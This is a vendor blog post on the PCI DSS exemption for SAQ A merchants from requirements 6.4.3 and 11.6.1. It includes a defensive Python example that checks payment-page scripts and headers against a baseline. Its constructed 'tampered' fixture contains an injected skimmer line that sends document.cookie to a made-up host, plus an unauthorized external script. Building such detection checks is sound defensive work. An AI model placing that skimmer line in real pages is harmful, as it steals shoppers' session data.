We are a Data Security Platform (DSP) that allows organizations to discover, classify, and protect their most sensitive data and documents.
© 2025 DataStealth Inc. All Rights Reserved.
The PCI Security Standards Council (PCI SSC) has introduced a major change for merchants completing Self-Assessment Questionnaire (SAQ) A.
Under specific conditions, SAQ A merchants may now be exempt from PCI DSS requirements 6.4.3 and 11.6.1.
Here's what this means and why it matters.
In the lead-up to this announcement, there were rumors that the PCI SSC might delay the enforcement deadline for requirements 6.4.3 and 11.6.1, originally set for March 31st, 2025.
However, rather than announcing an extended deadline, the Council has instead introduced an exemption for SAQ A merchants—provided certain conditions are met.
SAQ A merchants are not subject to requirements 6.4.3 and 11.6.1 if the “merchant has confirmed that their site is not susceptible to attacks from scripts that could affect the merchant’s e-commerce system(s).”
You can find additional details in the PCI SSC's blog post here.
Update: On February 28th, 2025, the PCI SSC released FAQ 1588, clarifying how SAQ A merchants that use embedded payment forms or iframes from their TPSPs can demonstrate that their payment pages are "not susceptible" to script-based attacks. In FAQ 1588, the PCI SSC states that to demonstrate this, the merchant would essentially need either to implement the controls of requirements 6.4.3 and 11.6.1 itself or to obtain confirmation from its TPSP/payment processor that the embedded form or iframe is protected.
Learn more about this change in our latest blog here.
The exemption applies to two key requirements:
Requirement 6.4.3: managing all payment page scripts that are loaded and executed in the consumer's browser, including a method to confirm that each script is authorized, a method to assure the integrity of each script, and an inventory of all scripts with a written justification for each.
Requirement 11.6.1: a change- and tamper-detection mechanism that alerts personnel to unauthorized modification of the HTTP headers and the contents of payment pages as received by the consumer browser, evaluated at least once every seven days or at a frequency defined in the entity's targeted risk analysis.
Previously, all merchants, regardless of their SAQ type, were expected to comply with these requirements. Moving forward, SAQ A merchants that meet the condition above are no longer subject to them.
SAQ A merchants outsource all payment processing and cardholder data (CHD) management to TPSPs, meaning they don't directly handle sensitive card data themselves. As a result, responsibility for these controls rests with the TPSP.
To clarify: requirements 6.4.3 and 11.6.1 are not being removed from PCI DSS—they simply won’t apply to SAQ A merchants under these new conditions.
This change could significantly benefit e-commerce businesses that rely entirely on TPSPs for payment processing and CHD management. Eligible merchants can avoid implementing script management and monitoring controls themselves, which reduces the compliance burden and saves time and resources. The practical saving depends on how the merchant confirms that its site is "not susceptible": under FAQ 1588 that confirmation rests on either the merchant's own 6.4.3 and 11.6.1 controls or on confirmation from the TPSP, so merchants should obtain and retain that TPSP confirmation rather than treating the exemption as automatic.
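For readers who want to see what "script management and monitoring controls" look like in practice, the following is an added illustration written for this article; it is not DataStealth product code and not material from the PCI SSC. It assumes a hypothetical merchant checkout page that embeds an iframe and a script from the made-up TPSP host checkout.example-psp.com; the page HTML, the HTTP response headers, the authorized-script inventory and the "tampered" snapshot are all constructed inline. It combines an inventory and integrity check over the page's script tags, in the spirit of 6.4.3, with a comparison of page content and headers against a recorded baseline, in the spirit of 11.6.1.

```python
"""Added illustration of the kind of controls PCI DSS requirements 6.4.3 and
11.6.1 describe: an authorized-script inventory with integrity checks (6.4.3)
and a change-detection comparison of payment page content and HTTP headers
against a baseline (11.6.1). Example code for this article; every host, page,
header and script below is constructed, not real."""

import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(body: str) -> str:
    """Subresource Integrity style digest ('sha256-<base64>') of a script body."""
    digest = hashlib.sha256(body.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


class _ScriptCollector(HTMLParser):
    """Collects every <script> tag: external ones by src plus any integrity
    attribute, inline ones by their body text."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append({"src": a["src"], "integrity": a.get("integrity")})
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            self.scripts.append({"inline": "".join(self._buf).strip()})


def audit_payment_page(html, headers, inventory, baseline_headers):
    """Compare a fetched payment page (HTML plus response headers) against the
    authorized-script inventory and the header baseline. Returns a list of
    findings; an empty list means nothing unexpected was found."""
    findings = []
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    for s in parser.scripts:
        if "src" in s:
            expected = inventory["external"].get(s["src"])
            if expected is None:
                findings.append(f"unauthorized external script: {s['src']}")
            elif s["integrity"] != expected:
                findings.append(f"integrity mismatch for {s['src']}: page has "
                                f"{s['integrity']!r}, inventory expects {expected!r}")
        elif sri_hash(s["inline"]) not in inventory["inline"]:
            findings.append(f"unauthorized inline script: {s['inline'][:60]!r}")
    actual = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    for name, expected in baseline_headers.items():
        got = actual.get(name.lower())
        if got != expected:
            findings.append(f"header {name} changed: expected {expected!r}, got {got!r}")
    return findings


# ---- constructed baseline: what the merchant has authorized and recorded ----
PSP = "https://checkout.example-psp.com"                      # made-up TPSP host
EMBED_SRC = PSP + "/v1/embed.js"
EMBED_SRI = sri_hash("/* stand-in for the TPSP's embed.js */")  # constructed digest
INLINE_OK = ('document.getElementById("pay").addEventListener("submit", '
             'function () { window.checkoutStarted = true; });')
INVENTORY = {
    "external": {EMBED_SRC: EMBED_SRI},   # src -> expected integrity value
    "inline": {sri_hash(INLINE_OK)},      # digests of authorized inline scripts
}
BASELINE_HEADERS = {
    "Content-Security-Policy": f"default-src 'self'; script-src 'self' {PSP}; frame-src {PSP}",
    "X-Frame-Options": "DENY",
}
BASELINE_HTML = f"""<html><head>
<script src="{EMBED_SRC}" integrity="{EMBED_SRI}" crossorigin="anonymous"></script>
</head><body>
<form id="pay"><iframe src="{PSP}/v1/frame"></iframe></form>
<script>{INLINE_OK}</script>
</body></html>"""

# ---- constructed snapshot after an unauthorized change to page and headers ----
INLINE_TAMPERED = INLINE_OK + ' new Image().src = "https://cdn.example-tag.net/c?d=" + document.cookie;'
TAMPERED_HEADERS = {**BASELINE_HEADERS,
                    "Content-Security-Policy": BASELINE_HEADERS["Content-Security-Policy"]
                    + " https://cdn.example-tag.net"}
TAMPERED_HTML = BASELINE_HTML.replace(
    "</head>", '<script src="https://cdn.example-tag.net/t.js"></script></head>'
).replace(INLINE_OK, INLINE_TAMPERED)

if __name__ == "__main__":
    for name, html, hdrs in (("baseline", BASELINE_HTML, BASELINE_HEADERS),
                             ("tampered", TAMPERED_HTML, TAMPERED_HEADERS)):
        print(name, audit_payment_page(html, hdrs, INVENTORY, BASELINE_HEADERS) or ["no changes"])
```

Run as a script, the baseline snapshot produces no findings and the tampered snapshot produces three: the unauthorized external script, the modified inline script, and the loosened Content-Security-Policy header. In a real deployment the HTML and headers would be fetched from the live page as a consumer browser would see them and the check scheduled at the cadence 11.6.1 calls for; the inventory and baseline would be maintained under change control so that every authorized change is recorded before the next evaluation runs.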
Additionally, larger merchants may explore whether they can benefit from the same exemption by moving payment capture to TPSP-hosted pages or iframes, reducing their PCI DSS scope to the point where SAQ A applies.